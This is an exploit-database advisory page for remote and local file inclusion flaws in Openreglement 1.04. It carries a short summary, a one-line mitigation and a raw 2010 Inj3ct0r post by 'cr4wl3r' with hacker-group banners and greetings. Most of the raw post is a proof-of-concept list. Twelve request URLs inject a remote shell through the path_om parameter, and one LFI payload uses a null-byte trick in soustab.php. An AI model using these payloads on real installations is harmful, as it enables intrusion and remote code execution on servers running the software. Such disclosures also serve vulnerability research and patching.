Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability

vendor:

Openreglement

by:

cr4wl3r

7.5

CVSS

HIGH

RFI/LFI

CWE

Product Name: Openreglement

Affected Version From: 01.04

Affected Version To: 01.04

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability

Openreglement 1.04 has a vulnerability that allows remote file inclusion (RFI) and local file inclusion (LFI). This vulnerability can be exploited by an attacker to include arbitrary files from the server, leading to potential information disclosure or remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and avoid using user-supplied input in file inclusion functions.

Source

Exploit-DB raw data:

================================================================
Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability
================================================================


[+] Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Download: https://adullact.net/frs/download.php/4273/openmairie_reglement_1.04.zip
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, ggcc.web.id

[+] Thanks to: opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
               EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
               SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[+] PoC:

[~] RFI:
http://shell4u.tk/[path]/obj/accompagnants.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/dossier.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/motif_cni.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/utilisateur.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/centre.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/droit.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/motif_retour.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/profil.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/collectivite.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/doc_identite.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/mention.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/titre_presente_enf.class.php?path_om=[Shell]

[~] LFI:
http://shell4u.tk/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]


# Inj3ct0r.com [2010-04-20]